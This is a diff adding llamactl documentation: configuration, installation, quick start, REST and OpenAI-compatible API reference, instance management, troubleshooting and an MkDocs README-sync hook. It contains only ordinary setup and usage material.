- `LLAMACTL_VLLM_ENV` - Environment variables in format "KEY1=value1,KEY2=value2"
- `LLAMACTL_VLLM_DOCKER_ENABLED` - Enable Docker runtime (true/false)
- `LLAMACTL_VLLM_DOCKER_IMAGE` - Docker image to use
- `LLAMACTL_VLLM_DOCKER_ARGS` - Space-separated Docker arguments
- `LLAMACTL_VLLM_DOCKER_ENV` - Docker environment variables in format "KEY1=value1,KEY2=value2"
**MLX Backend:**
- `LLAMACTL_MLX_COMMAND` - MLX executable command
- `LLAMACTL_MLX_ARGS` - Space-separated default arguments
- `LLAMACTL_MLX_ENV` - Environment variables in format "KEY1=value1,KEY2=value2"
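For illustration, the `KEY1=value1,KEY2=value2` list format could be decoded with a small helper like the sketch below. This is only an assumption about the format described above, not llamactl's actual parser:
```go
package main

import (
	"fmt"
	"strings"
)

// parseEnvList is an illustrative helper (not part of llamactl) that splits
// a "KEY1=value1,KEY2=value2" string into a map of environment variables.
func parseEnvList(s string) map[string]string {
	env := make(map[string]string)
	for _, pair := range strings.Split(s, ",") {
		if pair == "" {
			continue
		}
		kv := strings.SplitN(pair, "=", 2)
		if len(kv) == 2 {
			env[strings.TrimSpace(kv[0])] = kv[1]
		}
	}
	return env
}

func main() {
	fmt.Println(parseEnvList("CUDA_VISIBLE_DEVICES=0,OMP_NUM_THREADS=8"))
	// map[CUDA_VISIBLE_DEVICES:0 OMP_NUM_THREADS:8]
}
```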
### Instance Configuration
```yaml
instances:
port_range: [8000, 9000] # Port range for instances (default: [8000, 9000])
data_dir: "~/.local/share/llamactl" # Directory for all llamactl data (default varies by OS)
configs_dir: "~/.local/share/llamactl/instances" # Directory for instance configs (default: data_dir/instances)
logs_dir: "~/.local/share/llamactl/logs" # Directory for instance logs (default: data_dir/logs)
auto_create_dirs: true # Automatically create data/config/logs directories (default: true)
max_instances: -1 # Maximum instances (-1 = unlimited)
max_running_instances: -1 # Maximum running instances (-1 = unlimited)
enable_lru_eviction: true # Enable LRU eviction for idle instances
default_auto_restart: true # Default auto-restart setting
default_max_restarts: 3 # Default maximum restart attempts
default_restart_delay: 5 # Default restart delay in seconds
default_on_demand_start: true # Default on-demand start setting
on_demand_start_timeout: 120 # Default on-demand start timeout in seconds
timeout_check_interval: 5 # Default instance timeout check interval in minutes
```
**Environment Variables:**
- `LLAMACTL_INSTANCE_PORT_RANGE` - Port range (format: "8000-9000" or "8000,9000")
- `LLAMACTL_DATA_DIRECTORY` - Data directory path
- `LLAMACTL_INSTANCES_DIR` - Instance configs directory path
- `LLAMACTL_LOGS_DIR` - Log directory path
- `LLAMACTL_AUTO_CREATE_DATA_DIR` - Auto-create data/config/logs directories (true/false)
- `LLAMACTL_MAX_INSTANCES` - Maximum number of instances
- `LLAMACTL_MAX_RUNNING_INSTANCES` - Maximum number of running instances
- `LLAMACTL_ENABLE_LRU_EVICTION` - Enable LRU eviction for idle instances
- `LLAMACTL_DEFAULT_AUTO_RESTART` - Default auto-restart setting (true/false)
- `LLAMACTL_DEFAULT_MAX_RESTARTS` - Default maximum restarts
- `LLAMACTL_DEFAULT_RESTART_DELAY` - Default restart delay in seconds
- `LLAMACTL_DEFAULT_ON_DEMAND_START` - Default on-demand start setting (true/false)
- `LLAMACTL_ON_DEMAND_START_TIMEOUT` - Default on-demand start timeout in seconds
- `LLAMACTL_TIMEOUT_CHECK_INTERVAL` - Default instance timeout check interval in minutes
### Authentication Configuration
```yaml
auth:
require_inference_auth: true # Require API key for OpenAI endpoints (default: true)
inference_keys: [] # List of valid inference API keys
require_management_auth: true # Require API key for management endpoints (default: true)
management_keys: [] # List of valid management API keys
```
**Environment Variables:**
- `LLAMACTL_REQUIRE_INFERENCE_AUTH` - Require auth for OpenAI endpoints (true/false)
- `LLAMACTL_INFERENCE_KEYS` - Comma-separated inference API keys
- `LLAMACTL_REQUIRE_MANAGEMENT_AUTH` - Require auth for management endpoints (true/false)
- `LLAMACTL_MANAGEMENT_KEYS` - Comma-separated management API keys
## Command Line Options
View all available command line options:
```bash
llamactl --help
```
You can also override configuration using command line flags when starting llamactl.


@@ -0,0 +1,105 @@
# Installation
This guide will walk you through installing Llamactl on your system.
## Prerequisites
### Backend Dependencies
llamactl supports multiple backends. Install at least one:
**For llama.cpp backend (all platforms):**
You need `llama-server` from [llama.cpp](https://github.com/ggml-org/llama.cpp) installed:
```bash
# Homebrew (macOS/Linux)
brew install llama.cpp
# Winget (Windows)
winget install llama.cpp
```
Or build from source - see llama.cpp docs
**For MLX backend (macOS only):**
MLX provides optimized inference on Apple Silicon. Install MLX-LM:
```bash
# Install via pip (requires Python 3.8+)
pip install mlx-lm
# Or in a virtual environment (recommended)
python -m venv mlx-env
source mlx-env/bin/activate
pip install mlx-lm
```
Note: MLX backend is only available on macOS with Apple Silicon (M1, M2, M3, etc.)
**For vLLM backend:**
vLLM provides high-throughput distributed serving for LLMs. Install vLLM:
```bash
# Install via pip (requires Python 3.8+, GPU required)
pip install vllm
# Or in a virtual environment (recommended)
python -m venv vllm-env
source vllm-env/bin/activate
pip install vllm
# For production deployments, consider container-based installation
```
## Installation Methods
### Option 1: Download Binary (Recommended)
Download the latest release from the [GitHub releases page](https://github.com/lordmathis/llamactl/releases):
```bash
# Linux/macOS - Get latest version and download
LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
curl -L https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-$(uname -s | tr '[:upper:]' '[:lower:]')-$(uname -m).tar.gz | tar -xz
sudo mv llamactl /usr/local/bin/
# Or download manually from:
# https://github.com/lordmathis/llamactl/releases/latest
# Windows - Download from releases page
```
### Option 2: Build from Source
Requirements:
- Go 1.24 or later
- Node.js 22 or later
- Git
If you prefer to build from source:
```bash
# Clone the repository
git clone https://github.com/lordmathis/llamactl.git
cd llamactl
# Build the web UI
cd webui && npm ci && npm run build && cd ..
# Build the application
go build -o llamactl ./cmd/server
```
## Verification
Verify your installation by checking the version:
```bash
llamactl --version
```
## Next Steps
Now that Llamactl is installed, continue to the [Quick Start](quick-start.md) guide to get your first instance running!


@@ -0,0 +1,190 @@
# Quick Start
This guide will help you get Llamactl up and running in just a few minutes.
## Step 1: Start Llamactl
Start the Llamactl server:
```bash
llamactl
```
By default, Llamactl will start on `http://localhost:8080`.
## Step 2: Access the Web UI
Open your web browser and navigate to:
```
http://localhost:8080
```
Log in with the management API key. By default, it is generated during server startup; copy it from the terminal output.
You should see the Llamactl web interface.
## Step 3: Create Your First Instance
1. Click the "Add Instance" button
2. Fill in the instance configuration:
- **Name**: Give your instance a descriptive name
- **Backend Type**: Choose from llama.cpp, MLX, or vLLM
- **Model**: Model path or identifier for your chosen backend
- **Additional Options**: Backend-specific parameters
3. Click "Create Instance"
## Step 4: Start Your Instance
Once created, you can:
- **Start** the instance by clicking the start button
- **Monitor** its status in real-time
- **View logs** by clicking the logs button
- **Stop** the instance when needed
## Example Configurations
Here are basic example configurations for each backend:
**llama.cpp backend:**
```json
{
"name": "llama2-7b",
"backend_type": "llama_cpp",
"backend_options": {
"model": "/path/to/llama-2-7b-chat.gguf",
"threads": 4,
"ctx_size": 2048,
"gpu_layers": 32
}
}
```
**MLX backend (macOS only):**
```json
{
"name": "mistral-mlx",
"backend_type": "mlx_lm",
"backend_options": {
"model": "mlx-community/Mistral-7B-Instruct-v0.3-4bit",
"temp": 0.7,
"max_tokens": 2048
}
}
```
**vLLM backend:**
```json
{
"name": "dialogpt-vllm",
"backend_type": "vllm",
"backend_options": {
"model": "microsoft/DialoGPT-medium",
"tensor_parallel_size": 2,
"gpu_memory_utilization": 0.9
}
}
```
## Docker Support
Llamactl can run backends in Docker containers. To enable Docker for a backend, add a `docker` section to that backend in your YAML configuration file (e.g. `config.yaml`) as shown below:
```yaml
backends:
vllm:
command: "vllm"
args: ["serve"]
docker:
enabled: true
image: "vllm/vllm-openai:latest"
args: ["run", "--rm", "--network", "host", "--gpus", "all", "--shm-size", "1g"]
```
## Using the API
You can also manage instances via the REST API:
```bash
# List all instances
curl http://localhost:8080/api/v1/instances
# Create a new llama.cpp instance
curl -X POST http://localhost:8080/api/v1/instances/my-model \
-H "Content-Type: application/json" \
-d '{
"backend_type": "llama_cpp",
"backend_options": {
"model": "/path/to/model.gguf"
}
}'
# Start an instance
curl -X POST http://localhost:8080/api/v1/instances/my-model/start
```
## OpenAI Compatible API
Llamactl provides OpenAI-compatible endpoints, making it easy to integrate with existing OpenAI client libraries and tools.
### Chat Completions
Once you have an instance running, you can use it with the OpenAI-compatible chat completions endpoint:
```bash
curl -X POST http://localhost:8080/v1/chat/completions \
-H "Content-Type: application/json" \
-d '{
"model": "my-model",
"messages": [
{
"role": "user",
"content": "Hello! Can you help me write a Python function?"
}
],
"max_tokens": 150,
"temperature": 0.7
}'
```
### Using with Python OpenAI Client
You can also use the official OpenAI Python client:
```python
from openai import OpenAI
# Point the client to your Llamactl server
client = OpenAI(
base_url="http://localhost:8080/v1",
api_key="not-needed" # Llamactl doesn't require API keys by default
)
# Create a chat completion
response = client.chat.completions.create(
model="my-model", # Use the name of your instance
messages=[
{"role": "user", "content": "Explain quantum computing in simple terms"}
],
max_tokens=200,
temperature=0.7
)
print(response.choices[0].message.content)
```
### List Available Models
Get a list of running instances (models) in OpenAI-compatible format:
```bash
curl http://localhost:8080/v1/models
```
## Next Steps
- Learn how to manage instances in [Managing Instances](../user-guide/managing-instances.md)
- Explore the [API Reference](../user-guide/api-reference.md)
- Configure advanced settings in the [Configuration](configuration.md) guide

(binary image file added; 69 KiB)

docs/images/dashboard.png (binary image file added; 31 KiB)
docs/index.md (new file, 34 lines added)

@@ -0,0 +1,34 @@
# Llamactl Documentation
Welcome to the Llamactl documentation!
![Dashboard Screenshot](images/dashboard.png)
## What is Llamactl?
**{{HEADLINE}}**
## Features
{{FEATURES}}
## Quick Links
- [Installation Guide](getting-started/installation.md) - Get Llamactl up and running
- [Configuration Guide](getting-started/configuration.md) - Detailed configuration options
- [Quick Start](getting-started/quick-start.md) - Your first steps with Llamactl
- [Managing Instances](user-guide/managing-instances.md) - Instance lifecycle management
- [API Reference](user-guide/api-reference.md) - Complete API documentation
## Getting Help
If you need help or have questions:
- Check the [Troubleshooting](user-guide/troubleshooting.md) guide
- Visit the [GitHub repository](https://github.com/lordmathis/llamactl)
- Review the [Configuration Guide](getting-started/configuration.md) for advanced settings
## License
MIT License - see the [LICENSE](https://github.com/lordmathis/llamactl/blob/main/LICENSE) file.

docs/readme_sync.py (new file, 62 lines added)

@@ -0,0 +1,62 @@
"""
MkDocs hook to sync content from README.md to docs/index.md
"""
import re
import os
def on_page_markdown(markdown, page, config, **kwargs):
"""Process markdown content before rendering"""
# Only process the index.md file
if page.file.src_path != 'index.md':
return markdown
# Get the path to README.md (relative to mkdocs.yml)
readme_path = os.path.join(os.path.dirname(config['config_file_path']), 'README.md')
if not os.path.exists(readme_path):
print(f"Warning: README.md not found at {readme_path}")
return markdown
try:
with open(readme_path, 'r', encoding='utf-8') as f:
readme_content = f.read()
except Exception as e:
print(f"Error reading README.md: {e}")
return markdown
# Extract headline (the text in bold after the title)
headline_match = re.search(r'\*\*(.*?)\*\*', readme_content)
headline = headline_match.group(1) if headline_match else 'Management server for llama.cpp and MLX instances'
# Extract features section - everything between ## Features and the next ## heading
features_match = re.search(r'## Features\n(.*?)(?=\n## |\Z)', readme_content, re.DOTALL)
if features_match:
features_content = features_match.group(1).strip()
# Just add line breaks at the end of each line for proper MkDocs rendering
features_with_breaks = add_line_breaks(features_content)
else:
features_with_breaks = "Features content not found in README.md"
# Replace placeholders in the markdown
markdown = markdown.replace('{{HEADLINE}}', headline)
markdown = markdown.replace('{{FEATURES}}', features_with_breaks)
# Fix image paths: convert docs/images/ to images/ for MkDocs
markdown = re.sub(r'docs/images/', 'images/', markdown)
return markdown
def add_line_breaks(content):
"""Add two spaces at the end of each line for proper MkDocs line breaks"""
lines = content.split('\n')
processed_lines = []
for line in lines:
if line.strip(): # Only add spaces to non-empty lines
processed_lines.append(line.rstrip() + ' ')
else:
processed_lines.append(line)
return '\n'.join(processed_lines)


@@ -0,0 +1,527 @@
# API Reference
Complete reference for the Llamactl REST API.
## Base URL
All API endpoints are relative to the base URL:
```
http://localhost:8080/api/v1
```
## Authentication
Llamactl supports API key authentication. If authentication is enabled, include the API key in the Authorization header:
```bash
curl -H "Authorization: Bearer <your-api-key>" \
http://localhost:8080/api/v1/instances
```
The server supports two types of API keys:
- **Management API Keys**: Required for instance management operations (CRUD operations on instances)
- **Inference API Keys**: Required for OpenAI-compatible inference endpoints
## System Endpoints
### Get Llamactl Version
Get the version information of the llamactl server.
```http
GET /api/v1/version
```
**Response:**
```
Version: 1.0.0
Commit: abc123
Build Time: 2024-01-15T10:00:00Z
```
### Get Llama Server Help
Get help text for the llama-server command.
```http
GET /api/v1/backends/llama-cpp/help
```
**Response:** Plain text help output from `llama-server --help`
### Get Llama Server Version
Get version information of the llama-server binary.
```http
GET /api/v1/backends/llama-cpp/version
```
**Response:** Plain text version output from `llama-server --version`
### List Available Devices
List available devices for llama-server.
```http
GET /api/v1/backends/llama-cpp/devices
```
**Response:** Plain text device list from `llama-server --list-devices`
## Instances
### List All Instances
Get a list of all instances.
```http
GET /api/v1/instances
```
**Response:**
```json
[
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
]
```
### Get Instance Details
Get detailed information about a specific instance.
```http
GET /api/v1/instances/{name}
```
**Response:**
```json
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
```
### Create Instance
Create and start a new instance.
```http
POST /api/v1/instances/{name}
```
**Request Body:** JSON object with instance configuration. Common fields include:
- `backend_type`: Backend type (`llama_cpp`, `mlx_lm`, or `vllm`)
- `backend_options`: Backend-specific configuration
- `auto_restart`: Enable automatic restart on failure
- `max_restarts`: Maximum restart attempts
- `restart_delay`: Delay between restarts in seconds
- `on_demand_start`: Start instance when receiving requests
- `idle_timeout`: Idle timeout in minutes
- `environment`: Environment variables as key-value pairs
See [Managing Instances](managing-instances.md) for complete configuration options.
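For illustration, here is a minimal Go sketch that creates an instance using the fields above; the instance name, model path, and API key are placeholders, not values from this project:
```go
package main

import (
	"bytes"
	"fmt"
	"log"
	"net/http"
)

func main() {
	// Request body using the fields described above.
	body := []byte(`{
	  "backend_type": "llama_cpp",
	  "backend_options": {"model": "/models/example.gguf", "ctx_size": 4096},
	  "auto_restart": true,
	  "environment": {"CUDA_VISIBLE_DEVICES": "0"}
	}`)

	req, err := http.NewRequest(http.MethodPost,
		"http://localhost:8080/api/v1/instances/my-model", bytes.NewReader(body))
	if err != nil {
		log.Fatal(err)
	}
	req.Header.Set("Content-Type", "application/json")
	// Required when management authentication is enabled.
	req.Header.Set("Authorization", "Bearer your-management-key")

	resp, err := http.DefaultClient.Do(req)
	if err != nil {
		log.Fatal(err)
	}
	defer resp.Body.Close()
	fmt.Println(resp.Status) // expect 201 Created on success
}
```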
**Response:**
```json
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
```
### Update Instance
Update an existing instance configuration. See [Managing Instances](managing-instances.md) for available configuration options.
```http
PUT /api/v1/instances/{name}
```
**Request Body:** JSON object with configuration fields to update.
**Response:**
```json
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
```
### Delete Instance
Stop and remove an instance.
```http
DELETE /api/v1/instances/{name}
```
**Response:** `204 No Content`
## Instance Operations
### Start Instance
Start a stopped instance.
```http
POST /api/v1/instances/{name}/start
```
**Response:**
```json
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
```
**Error Responses:**
- `409 Conflict`: Maximum number of running instances reached
- `500 Internal Server Error`: Failed to start instance
### Stop Instance
Stop a running instance.
```http
POST /api/v1/instances/{name}/stop
```
**Response:**
```json
{
"name": "llama2-7b",
"status": "stopped",
"created": 1705312200
}
```
### Restart Instance
Restart an instance (stop then start).
```http
POST /api/v1/instances/{name}/restart
```
**Response:**
```json
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
```
### Get Instance Logs
Retrieve instance logs.
```http
GET /api/v1/instances/{name}/logs
```
**Query Parameters:**
- `lines`: Number of lines to return (defaults to all lines; `-1` also returns all lines)
**Response:** Plain text log output
**Example:**
```bash
curl "http://localhost:8080/api/v1/instances/my-instance/logs?lines=100"
```
### Proxy to Instance
Proxy HTTP requests directly to the llama-server instance.
```http
GET /api/v1/instances/{name}/proxy/*
POST /api/v1/instances/{name}/proxy/*
```
This endpoint forwards all requests to the underlying llama-server instance running on its configured port. The proxy strips the `/api/v1/instances/{name}/proxy` prefix and forwards the remaining path to the instance.
**Example - Check Instance Health:**
```bash
curl -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances/my-model/proxy/health
```
This forwards the request to `http://instance-host:instance-port/health` on the actual llama-server instance.
**Error Responses:**
- `503 Service Unavailable`: Instance is not running
## OpenAI-Compatible API
Llamactl provides OpenAI-compatible endpoints for inference operations.
### List Models
List all instances in OpenAI-compatible format.
```http
GET /v1/models
```
**Response:**
```json
{
"object": "list",
"data": [
{
"id": "llama2-7b",
"object": "model",
"created": 1705312200,
"owned_by": "llamactl"
}
]
}
```
### Chat Completions, Completions, Embeddings
All OpenAI-compatible inference endpoints are available:
```http
POST /v1/chat/completions
POST /v1/completions
POST /v1/embeddings
POST /v1/rerank
POST /v1/reranking
```
**Request Body:** Standard OpenAI format with `model` field specifying the instance name
**Example:**
```json
{
"model": "llama2-7b",
"messages": [
{
"role": "user",
"content": "Hello, how are you?"
}
]
}
```
The server routes requests to the appropriate instance based on the `model` field in the request body. Instances with on-demand starting enabled will be automatically started if not running. For configuration details, see [Managing Instances](managing-instances.md).
**Error Responses:**
- `400 Bad Request`: Invalid request body or missing instance name
- `503 Service Unavailable`: Instance is not running and on-demand start is disabled
- `409 Conflict`: Cannot start instance due to maximum instances limit
## Instance Status Values
Instances can have the following status values:
- `stopped`: Instance is not running
- `running`: Instance is running and ready to accept requests
- `failed`: Instance failed to start or crashed
## Error Responses
All endpoints may return error responses in the following format:
```json
{
"error": "Error message description"
}
```
### Common HTTP Status Codes
- `200`: Success
- `201`: Created
- `204`: No Content (successful deletion)
- `400`: Bad Request (invalid parameters or request body)
- `401`: Unauthorized (missing or invalid API key)
- `403`: Forbidden (insufficient permissions)
- `404`: Not Found (instance not found)
- `409`: Conflict (instance already exists, max instances reached)
- `500`: Internal Server Error
- `503`: Service Unavailable (instance not running)
## Examples
### Complete Instance Lifecycle
```bash
# Create and start instance
curl -X POST http://localhost:8080/api/v1/instances/my-model \
-H "Content-Type: application/json" \
-H "Authorization: Bearer your-api-key" \
-d '{
"backend_type": "llama_cpp",
"backend_options": {
"model": "/models/llama-2-7b.gguf",
"gpu_layers": 32
},
"environment": {
"CUDA_VISIBLE_DEVICES": "0",
"OMP_NUM_THREADS": "8"
}
}'
# Check instance status
curl -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances/my-model
# Get instance logs
curl -H "Authorization: Bearer your-api-key" \
"http://localhost:8080/api/v1/instances/my-model/logs?lines=50"
# Use OpenAI-compatible chat completions
curl -X POST http://localhost:8080/v1/chat/completions \
-H "Content-Type: application/json" \
-H "Authorization: Bearer your-inference-api-key" \
-d '{
"model": "my-model",
"messages": [
{"role": "user", "content": "Hello!"}
],
"max_tokens": 100
}'
# Stop instance
curl -X POST -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances/my-model/stop
# Delete instance
curl -X DELETE -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances/my-model
```
### Using the Proxy Endpoint
You can also directly proxy requests to the llama-server instance:
```bash
# Direct proxy to instance (bypasses OpenAI compatibility layer)
curl -X POST http://localhost:8080/api/v1/instances/my-model/proxy/completion \
-H "Content-Type: application/json" \
-H "Authorization: Bearer your-api-key" \
-d '{
"prompt": "Hello, world!",
"n_predict": 50
}'
```
## Backend-Specific Endpoints
### Parse Commands
Llamactl provides endpoints to parse command strings from different backends into instance configuration options.
#### Parse Llama.cpp Command
Parse a llama-server command string into instance options.
```http
POST /api/v1/backends/llama-cpp/parse-command
```
**Request Body:**
```json
{
"command": "llama-server -m /path/to/model.gguf -c 2048 --port 8080"
}
```
**Response:**
```json
{
"backend_type": "llama_cpp",
"llama_server_options": {
"model": "/path/to/model.gguf",
"ctx_size": 2048,
"port": 8080
}
}
```
#### Parse MLX-LM Command
Parse an MLX-LM server command string into instance options.
```http
POST /api/v1/backends/mlx/parse-command
```
**Request Body:**
```json
{
"command": "mlx_lm.server --model /path/to/model --port 8080"
}
```
**Response:**
```json
{
"backend_type": "mlx_lm",
"mlx_server_options": {
"model": "/path/to/model",
"port": 8080
}
}
```
#### Parse vLLM Command
Parse a vLLM serve command string into instance options.
```http
POST /api/v1/backends/vllm/parse-command
```
**Request Body:**
```json
{
"command": "vllm serve /path/to/model --port 8080"
}
```
**Response:**
```json
{
"backend_type": "vllm",
"vllm_server_options": {
"model": "/path/to/model",
"port": 8080
}
}
```
**Error Responses for Parse Commands:**
- `400 Bad Request`: Invalid request body, empty command, or parse error
- `500 Internal Server Error`: Encoding error
## Auto-Generated Documentation
The API documentation is automatically generated from code annotations using Swagger/OpenAPI. To regenerate the documentation:
1. Install the swag tool: `go install github.com/swaggo/swag/cmd/swag@latest`
2. Generate docs: `swag init -g cmd/server/main.go -o apidocs`
## Swagger Documentation
If swagger documentation is enabled in the server configuration, you can access the interactive API documentation at:
```
http://localhost:8080/swagger/
```
This provides a complete interactive interface for testing all API endpoints.


@@ -0,0 +1,229 @@
# Managing Instances
Learn how to effectively manage your llama.cpp, MLX, and vLLM instances with Llamactl through both the Web UI and API.
## Overview
Llamactl provides two ways to manage instances:
- **Web UI**: Accessible at `http://localhost:8080` with an intuitive dashboard
- **REST API**: Programmatic access for automation and integration
![Dashboard Screenshot](../images/dashboard.png)
### Authentication
If authentication is enabled:
1. Navigate to the web UI
2. Enter your credentials
3. Bearer token is stored for the session
### Theme Support
- Switch between light and dark themes
- Setting is remembered across sessions
## Instance Cards
Each instance is displayed as a card showing:
- **Instance name**
- **Health status badge** (unknown, ready, error, failed)
- **Action buttons** (start, stop, edit, logs, delete)
## Create Instance
### Via Web UI
![Create Instance Screenshot](../images/create_instance.png)
1. Click the **"Create Instance"** button on the dashboard
2. Enter a unique **Name** for your instance (only required field)
3. **Choose Backend Type**:
- **llama.cpp**: For GGUF models using llama-server
- **MLX**: For MLX-optimized models (macOS only)
- **vLLM**: For distributed serving and high-throughput inference
4. Configure model source:
- **For llama.cpp**: GGUF model path or HuggingFace repo
- **For MLX**: MLX model path or identifier (e.g., `mlx-community/Mistral-7B-Instruct-v0.3-4bit`)
- **For vLLM**: HuggingFace model identifier (e.g., `microsoft/DialoGPT-medium`)
5. Configure optional instance management settings:
- **Auto Restart**: Automatically restart instance on failure
- **Max Restarts**: Maximum number of restart attempts
- **Restart Delay**: Delay in seconds between restart attempts
- **On Demand Start**: Start instance when receiving a request to the OpenAI compatible endpoint
- **Idle Timeout**: Minutes before stopping idle instance (set to 0 to disable)
- **Environment Variables**: Set custom environment variables for the instance process
6. Configure backend-specific options:
- **llama.cpp**: Threads, context size, GPU layers, port, etc.
- **MLX**: Temperature, top-p, adapter path, Python environment, etc.
- **vLLM**: Tensor parallel size, GPU memory utilization, quantization, etc.
7. Click **"Create"** to save the instance
### Via API
```bash
# Create llama.cpp instance with local model file
curl -X POST http://localhost:8080/api/v1/instances/my-llama-instance \
-H "Content-Type: application/json" \
-d '{
"backend_type": "llama_cpp",
"backend_options": {
"model": "/path/to/model.gguf",
"threads": 8,
"ctx_size": 4096,
"gpu_layers": 32
}
}'
# Create MLX instance (macOS only)
curl -X POST http://localhost:8080/api/v1/instances/my-mlx-instance \
-H "Content-Type: application/json" \
-d '{
"backend_type": "mlx_lm",
"backend_options": {
"model": "mlx-community/Mistral-7B-Instruct-v0.3-4bit",
"temp": 0.7,
"top_p": 0.9,
"max_tokens": 2048
},
"auto_restart": true,
"max_restarts": 3
}'
# Create vLLM instance
curl -X POST http://localhost:8080/api/v1/instances/my-vllm-instance \
-H "Content-Type: application/json" \
-d '{
"backend_type": "vllm",
"backend_options": {
"model": "microsoft/DialoGPT-medium",
"tensor_parallel_size": 2,
"gpu_memory_utilization": 0.9
},
"auto_restart": true,
"on_demand_start": true,
"environment": {
"CUDA_VISIBLE_DEVICES": "0,1",
"NCCL_DEBUG": "INFO",
"PYTHONPATH": "/custom/path"
}
}'
# Create llama.cpp instance with HuggingFace model
curl -X POST http://localhost:8080/api/v1/instances/gemma-3-27b \
-H "Content-Type: application/json" \
-d '{
"backend_type": "llama_cpp",
"backend_options": {
"hf_repo": "unsloth/gemma-3-27b-it-GGUF",
"hf_file": "gemma-3-27b-it-GGUF.gguf",
"gpu_layers": 32
}
}'
```
## Start Instance
### Via Web UI
1. Click the **"Start"** button on an instance card
2. Watch the status change to "Unknown"
3. Monitor progress in the logs
4. Instance status changes to "Ready" when ready
### Via API
```bash
curl -X POST http://localhost:8080/api/v1/instances/{name}/start
```
## Stop Instance
### Via Web UI
1. Click the **"Stop"** button on an instance card
2. Instance gracefully shuts down
### Via API
```bash
curl -X POST http://localhost:8080/api/v1/instances/{name}/stop
```
## Edit Instance
### Via Web UI
1. Click the **"Edit"** button on an instance card
2. Modify settings in the configuration dialog
3. Changes require instance restart to take effect
4. Click **"Update & Restart"** to apply changes
### Via API
Modify instance settings:
```bash
curl -X PUT http://localhost:8080/api/v1/instances/{name} \
-H "Content-Type: application/json" \
-d '{
"backend_options": {
"threads": 8,
"context_size": 4096
}
}'
```
!!! note
Configuration changes require restarting the instance to take effect.
## View Logs
### Via Web UI
1. Click the **"Logs"** button on any instance card
2. Real-time log viewer opens
### Via API
Retrieve logs via the API:
```bash
# Get instance logs
curl http://localhost:8080/api/v1/instances/{name}/logs
```
## Delete Instance
### Via Web UI
1. Click the **"Delete"** button on an instance card
2. Only stopped instances can be deleted
3. Confirm deletion in the dialog
### Via API
```bash
curl -X DELETE http://localhost:8080/api/v1/instances/{name}
```
## Instance Proxy
Llamactl proxies all requests to the underlying backend instances (llama-server, MLX, or vLLM).
```bash
# Send a request to the instance's root endpoint through the proxy
curl http://localhost:8080/api/v1/instances/{name}/proxy/
```
All backends provide OpenAI-compatible endpoints. Check the respective documentation:
- [llama-server docs](https://github.com/ggml-org/llama.cpp/blob/master/tools/server/README.md)
- [MLX-LM docs](https://github.com/ml-explore/mlx-lm/blob/main/mlx_lm/SERVER.md)
- [vLLM docs](https://docs.vllm.ai/en/latest/)
### Instance Health
#### Via Web UI
1. The health status badge is displayed on each instance card
#### Via API
Check the health status of your instances:
```bash
curl http://localhost:8080/api/v1/instances/{name}/proxy/health
```


@@ -0,0 +1,160 @@
# Troubleshooting
Issues specific to Llamactl deployment and operation.
## Configuration Issues
### Invalid Configuration
**Problem:** Invalid configuration preventing startup
**Solutions:**
1. Use minimal configuration:
```yaml
server:
host: "0.0.0.0"
port: 8080
instances:
port_range: [8000, 9000]
```
2. Check data directory permissions:
```bash
# Ensure data directory is writable (default: ~/.local/share/llamactl)
mkdir -p ~/.local/share/llamactl/{instances,logs}
```
## Instance Management Issues
### Model Loading Failures
**Problem:** Instance fails to start with model loading errors
**Common Solutions:**
- **llama-server not found:** Ensure `llama-server` binary is in PATH
- **Wrong model format:** Ensure model is in GGUF format
- **Insufficient memory:** Use smaller model or reduce context size
- **Path issues:** Use absolute paths to model files
### Memory Issues
**Problem:** Out of memory errors or system becomes unresponsive
**Solutions:**
1. **Reduce context size:**
```json
{
"n_ctx": 1024
}
```
2. **Use quantized models:**
- Try Q4_K_M instead of higher precision models
- Use smaller model variants (7B instead of 13B)
### GPU Configuration
**Problem:** GPU not being used effectively
**Solutions:**
1. **Configure GPU layers:**
```json
{
"n_gpu_layers": 35
}
```
### Advanced Instance Issues
**Problem:** Complex model loading, performance, or compatibility issues
Since llamactl uses `llama-server` under the hood, many instance-related issues are actually llama.cpp issues. For advanced troubleshooting:
**Resources:**
- **llama.cpp Documentation:** [https://github.com/ggml-org/llama.cpp](https://github.com/ggml-org/llama.cpp)
- **llama.cpp Issues:** [https://github.com/ggml-org/llama.cpp/issues](https://github.com/ggml-org/llama.cpp/issues)
- **llama.cpp Discussions:** [https://github.com/ggml-org/llama.cpp/discussions](https://github.com/ggml-org/llama.cpp/discussions)
**Testing directly with llama-server:**
```bash
# Test your model and parameters directly with llama-server
llama-server --model /path/to/model.gguf --port 8081 --n-gpu-layers 35
```
This helps determine if the issue is with llamactl or with the underlying llama.cpp/llama-server.
## API and Network Issues
### CORS Errors
**Problem:** Web UI shows CORS errors in browser console
**Solutions:**
1. **Configure allowed origins:**
```yaml
server:
allowed_origins:
- "http://localhost:3000"
- "https://yourdomain.com"
```
## Authentication Issues
**Problem:** API requests failing with authentication errors
**Solutions:**
1. **Disable authentication temporarily:**
```yaml
auth:
require_management_auth: false
require_inference_auth: false
```
2. **Configure API keys:**
```yaml
auth:
management_keys:
- "your-management-key"
inference_keys:
- "your-inference-key"
```
3. **Use correct Authorization header:**
```bash
curl -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances
```
## Debugging and Logs
### Viewing Instance Logs
```bash
# Get instance logs via API
curl http://localhost:8080/api/v1/instances/{name}/logs
# Or check log files directly
tail -f ~/.local/share/llamactl/logs/{instance-name}.log
```
### Enable Debug Logging
```bash
export LLAMACTL_LOG_LEVEL=debug
llamactl
```
## Getting Help
When reporting issues, include:
1. **System information:**
```bash
llamactl --version
```
2. **Configuration file** (remove sensitive keys)
3. **Relevant log output**
4. **Steps to reproduce the issue**

mkdocs.yml (new file, 79 lines added)

